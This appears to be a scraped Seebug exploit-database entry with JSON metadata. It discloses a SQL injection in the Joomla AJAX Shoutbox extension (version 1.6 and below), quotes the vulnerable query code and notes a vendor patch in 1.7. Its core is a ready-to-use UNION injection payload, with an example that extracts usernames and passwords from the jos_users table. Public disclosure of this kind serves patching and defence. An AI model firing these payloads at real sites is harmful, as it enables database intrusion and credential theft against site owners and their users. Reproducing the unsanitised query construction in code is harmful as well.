ID SSV:85625 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability
[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor : 12 March 2014
[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code:
113 $jal_lastID = JRequest::getVar( 'jal_lastID', 0 );
114
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
[-] Exploit:
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st
###################################################################################
{"href": "https://www.seebug.org/vuldb/ssvid-85625", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85625", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n ###################################################################################\r\nJoomla AJAX Shoutbox remote SQL Injection vulnerability\r\n\r\n[-] Author: Ibrahim Raafat\r\n[-] Contact: https://twitter.com/RaafatSEC\r\n[-] Discovery date: 1 April 2010 [ 4 years ago ]\r\n[-] Reported to vendor : 12 March 2014\r\n[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day\r\n[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43\r\n\r\n[+] Details:\r\n[-] include "helper.php";\r\n[-] parameter: jal_lastID\r\n[-] Code: \r\n113\t$jal_lastID = JRequest::getVar( 'jal_lastID',\t\t0\t\t );\r\n114\r\n115\t$query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';\r\n\r\n[-] Exploit: \r\n?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -\r\n\r\nExample:\r\n?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -\r\n\r\n[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]\r\nFounded by https://twitter.com/MSM_1st\r\n\r\n###################################################################################\r\n\r\n\r\n\n ", "id": "SSV:85625", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T15:20:18", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T15:20:18"}, "dependencies": {"references": [], "modified": "2017-11-19T15:20:18"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "references": []}